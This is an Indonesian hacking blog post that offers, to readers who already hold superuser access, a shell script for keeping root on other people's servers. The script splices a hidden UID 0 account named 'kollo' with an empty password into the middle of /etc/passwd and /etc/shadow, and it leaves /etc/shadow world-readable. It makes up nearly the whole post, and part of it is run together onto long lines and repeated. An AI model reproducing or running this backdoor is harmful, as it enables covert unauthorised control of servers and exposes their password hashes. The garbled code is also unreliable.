By: B_GILDrake
Saya juga adalah seorang newbie dan kalo memang tulisan ini kurang nyelimet di hati teman2x sekiranya mohon dimaafkan. Segala cacian, makian, umpetan, hinaan dan pujian
harap dilayangkan ke udara
(layangan kali yee) ehh sory ke D_A_S_H@internux.web.id. Langsung aja cess.
Jangan pernah bermimpi masuk ke server orang jika kita blum mengetahui ajian yang namanya rooting. rooting adalah Melacak ato mamasuki server server orang yang punya sistem yang lemah.
Tulisan ini diperuntukan buat orang yang udah punya akses superuser.
================================================
#!/bin/bash
#kill bill
#f*** bill
set kollo = (`grep kollo /etc/passwd`)
set kolot = (`grep kollo /etc/shadow`)if ($#kollo == 0) then set linecount = `wc -l /etc/passwd` cd cp /etc/passwd ./temppass @ linecount[1] /= 2 @ linecount[1]
+= 1 split -$linecount[1] ./temppass echo “kollo:x:0:520:b-gildrake:/root:/bin/bash” >> ./xaa cat ./xab >>./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd
rm ./xa* ./temppass passwd -d kollo echo good girl you root access is kollo else echo login masih ada echo grep kollo /etc/passwd endif
if ($#kollo == 0) then
set linecount = `wc -l /etc/passwd`
cd
cp /etc/passwd ./temppass
@ linecount[1] /= 2
@ linecount[1] += 1
split -$linecount[1] ./temppass
echo
“kollo:x:0:520:b-gildrake:/root:/bin/bash” >> ./xaa cat ./xab >>./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd rm ./xa* ./temppass
passwd -d kollo echo good girl you root access is kollo else echo login masih ada echo grep kollo /etc/passwd
endif
if ($#kolot == 0) then
set linecount = `wc -l /etc/shadow`
cd
cp /etc/shadow ./temppass
@ linecount[1] /= 2
@ linecount[1] += 1
split -$linecount[1] ./temppass
echo
“kollo:11614:0:99999:7::::” >> ./xaa
cat ./xab >>./xaa
mv ./xaa /etc/shadow
chmod 644 /etc/shadow
rm ./xa* ./temppass
echo good girl you root access is kollo
else
echo login masih ada
echo grep kollo /etc/shadow
endif
========================================================
:wq
ok deh slamat menikmati akses kollo anda okeyyyyy
Related Articles
1 user responded in this post
cool nice site
View this Comment in: English Chinese(S) Chinese(T) French Arabic Dutch German Greek Italian Japanese Korean Portuguese Russian Spanish
Leave A Reply
Please Note: Comment moderation maybe active so there is no need to resubmit your comments